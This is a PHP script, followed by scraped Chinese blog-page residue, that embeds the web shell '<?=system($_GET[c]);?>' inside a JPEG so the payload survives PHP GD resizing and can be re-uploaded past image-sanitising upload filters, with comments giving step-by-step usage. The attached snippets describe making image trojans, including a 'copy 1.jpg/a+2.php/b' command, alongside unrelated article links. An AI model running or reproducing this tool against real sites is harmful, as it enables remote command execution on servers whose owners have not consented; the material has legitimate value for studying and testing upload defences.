<?php

	/*

	The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().

	It is necessary that the size and quality of the initial image are the same as those of the processed image.

	1) Upload an arbitrary image via secured files upload script

	2) Save the processed image and launch:

	jpg_payload.php <jpg_name.jpg>

	In case of successful injection you will get a specially crafted image, which should be uploaded again.

	Since the most straightforward injection method is used, the following problems can occur:

	1) After the second processing the injected data may become partially corrupted.

	2) The jpg_payload.php script outputs "Something's wrong".

	If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

	Sergey Bobrov @Black2Fan.

	See also:

	https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

	*/

	$miniPayload = '<?=system($_GET[c]);?>';

	if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {

    	die('php-gd is not installed');

	}

	if(!isset($argv[1])) {

		die('php jpg_payload.php <jpg_name.jpg>');

	}

	set_error_handler("custom_error_handler");

	for($pad = 0; $pad < 1024; $pad++) {

		$nullbytePayloadSize = $pad;

		$dis = new DataInputStream($argv[1]);

		$outStream = file_get_contents($argv[1]);

		$extraBytes = 0;

		$correctImage = TRUE;

		if($dis->readShort() != 0xFFD8) {

			die('Incorrect SOI marker');

		}

		while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {

			$marker = $dis->readByte();

			$size = $dis->readShort() - 2;

			$dis->skip($size);

			if($marker === 0xDA) {

				$startPos = $dis->seek();

				$outStreamTmp =

					substr($outStream, 0, $startPos) .

					$miniPayload .

					str_repeat("\0",$nullbytePayloadSize) .

					substr($outStream, $startPos);

				checkImage('_'.$argv[1], $outStreamTmp, TRUE);

				if($extraBytes !== 0) {

					while((!$dis->eof())) {

						if($dis->readByte() === 0xFF) {

							if($dis->readByte !== 0x00) {

								break;

							}

						}

					}

					$stopPos = $dis->seek() - 2;

					$imageStreamSize = $stopPos - $startPos;

					$outStream =

						substr($outStream, 0, $startPos) .

						$miniPayload .

						substr(

							str_repeat("\0",$nullbytePayloadSize).

								substr($outStream, $startPos, $imageStreamSize),

							0,

							$nullbytePayloadSize+$imageStreamSize-$extraBytes) .

								substr($outStream, $stopPos);

				} elseif($correctImage) {

					$outStream = $outStreamTmp;

				} else {

					break;

				}

				if(checkImage('payload_'.$argv[1], $outStream)) {

					die('Success!');

				} else {

					break;

				}

			}

		}

	}

	unlink('payload_'.$argv[1]);

	die('Something\'s wrong');

	function checkImage($filename, $data, $unlink = FALSE) {

		global $correctImage;

		file_put_contents($filename, $data);

		$correctImage = TRUE;

		imagecreatefromjpeg($filename);

		if($unlink)

			unlink($filename);

		return $correctImage;

	}

	function custom_error_handler($errno, $errstr, $errfile, $errline) {

		global $extraBytes, $correctImage;

		$correctImage = FALSE;

		if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {

			if(isset($m[1])) {

				$extraBytes = (int)$m[1];

			}

		}

	}

	class DataInputStream {

		private $binData;

		private $order;

		private $size;

		public function __construct($filename, $order = false, $fromString = false) {

			$this->binData = '';

			$this->order = $order;

			if(!$fromString) {

				if(!file_exists($filename) || !is_file($filename))

					die('File not exists ['.$filename.']');

				$this->binData = file_get_contents($filename);

			} else {

				$this->binData = $filename;

			}

			$this->size = strlen($this->binData);

		}

		public function seek() {

			return ($this->size - strlen($this->binData));

		}

		public function skip($skip) {

			$this->binData = substr($this->binData, $skip);

		}

		public function readByte() {

			if($this->eof()) {

				die('End Of File');

			}

			$byte = substr($this->binData, 0, 1);

			$this->binData = substr($this->binData, 1);

			return ord($byte);

		}

		public function readShort() {

			if(strlen($this->binData) < 2) {

				die('End Of File');

			}

			$short = substr($this->binData, 0, 2);

			$this->binData = substr($this->binData, 2);

			if($this->order) {

				$short = (ord($short[1]) << 8) + ord($short[0]);

			} else {

				$short = (ord($short[0]) << 8) + ord($short[1]);

			}

			return $short;

		}

		public function eof() {

			return !$this->binData||(strlen($this->binData) === 0);

		}

	}

?>

  

突破GD渲染的图片马的更多相关文章

  1. 突破php的imagecopyresampled 和imagecopyresized 实现图片马JPG

    编辑器加载中...之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算 详见: https://www.ido ...

  2. 利用cmd制作一句话图片马

    先cd进在图片和一句话木马里面的文件夹 假设选择我的图片是:1.jpg 一句话是:2.php 命令:copy 1.jpg/a+2.php/b 生成的图片马

  3. php 简单的学习GD库绘制图片并传回给前端实现方式

    1.基本的GD库绘制图片汇总 2.后台实现小案例 <?php // $img = imagecreatetruecolor(200,40); // var_dump($img); // 利用GD ...

  4. sql注入记录------类型转换错误---convert()函数,一句话图片马制作

    sql注入在联合查询是出现一下错误查不到数据 Illegal mix of collations for operation 'UNION' 用convert() 转换编码为utf8 或者big5 就 ...

  5. php用GD库给图片添加水印

    php用GD库给图片添加文字水印,整个代码比较简单,DEMO如下: <?php /*打开图片*/ //1.配置图片路径 $src = "aeroplane.jpg"; //2 ...

  6. php课程 8-32 如何使用gd库进行图片裁剪和缩放

    php课程 8-32 如何使用gd库进行图片裁剪和缩放 一.总结 一句话总结:图片缩放到图片裁剪就是改变原图截取的位置以及截取的宽高. 1.电商网站那么多的图片,如果全部加载卡得慢的很,所以他们是怎么 ...

  7. 实战OpenGLES--iOS平台使用OpenGLES渲染YUV图片

    上一篇文章 实战FFmpeg--iOS平台使用FFmpeg将视频文件转换为YUV文件 演示了如何将视频文件转换为yuv文件保存,现在要做的是如何将yuv文件利用OpenGLES渲染展示出图像画面.要将 ...

  8. PHP面向对象——GD库实现图片水印和缩略图

    今天的实现目标就是使用GD库完成对图片加水印和图 片缩略图两个功能 动身前逻辑准备 属性: 路径 功能: 构造方法 生成水印的方法 获取 图片信息 获取位置信息(123 456 789) 创建图片资源 ...

  9. [原]零基础学习SDL开发之在Android使用SDL2.0渲染PNG图片

    在上一篇文章我们知道了如何在android使用SDL2.0来渲染显示一张bmp图,但是如果是一张png或者一张jpg的图,那么还能显示成功么?答案是否定的 我们需要移植SDL_image库来支持除bm ...

随机推荐

  1. 天地图API加载ArcGIS Server服务

    发布的服务需要选择WMS功能 wmsLayer = new T.TileLayer.WMS("http://127.0.0.1:6080/arcgis/services/Demo/Defau ...

  2. ES6基础之let、const

    es6的块级作用域通俗的讲就是一对花括号中的区域(声明对象的花括号不是块级作用域),块级作用域可以嵌套. let: 1.le声明的变量只在当前(块级)作用域内有效. 2.let声明的变量不能被重复声明 ...

  3. n个容器取油问题再探

    在 韩信分油问题的拓展分析 里,最后给出了一般性的结论,即: 用 n (n > 1) 个不规则无刻度的容器从一个无穷大的油桶里取油,这些容器容量都为整数升,分别记为 a1, a2, ..., a ...

  4. MySQL 实例空间使用率过高的原因和解决方法

    用户在使用 MySQL 实例时,会遇到空间使用告警甚至超过实例限额被锁定的情况.在 RDS 控制台的实例基本信息中,即会出现如下信息: 本文将介绍造成空间使用率过高的常见原因及其相应的解决方法.对于M ...

  5. 基于Nginx实现负载均衡的部署

    Nginx(enginex)是一个高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/SMTP服务器. nginx官方网站:http://nginx.org/ nginx plus收费软件, ...

  6. kubernetes 使用 PV 和 PVC 管理数据存储

    文章链接 容器磁盘上的文件的生命周期是短暂的,这就使得在容器中运行重要应用时会出现一些问题.首先,当容器崩溃时,kubelet 会重启它,但是容器中的文件将丢失--容器以干净的状态(镜像最初的状态)重 ...

  7. Python中 sys.argv[]

    sys.argv[]是一个从程序外部获取参数的桥梁,从外部取得的参数可以是多个,所以获得的是一个列表(list),用[]提取其中的元素.其第一个元素是程序本身,随后才依次是外部给予的参数. 实例 im ...

  8. noip模拟47

    原版在 \(linux\) 本地写完没保存关机给没了-- 再简单写一下 \(t2\) 用 \(dp\) 转移 \(f[i]=\sum _ {j=last[a[i]]}^{i-1} f[j]\) 用前缀 ...

  9. Kubernetes环境Traefik部署与应用

    本作品由Galen Suen采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议进行许可.由原作者转载自个人站点. 概述 本文用于整理基于Kubernetes环境的Traefik部署与应用, ...

  10. python-request 实现企业微信接口自动化-1(DDT)

    环境准备 python+requests 读取企业微信api开发文档,得知调用企业微信接口必须先获取企业微信的accesstoken是通过 ("corpid","&quo ...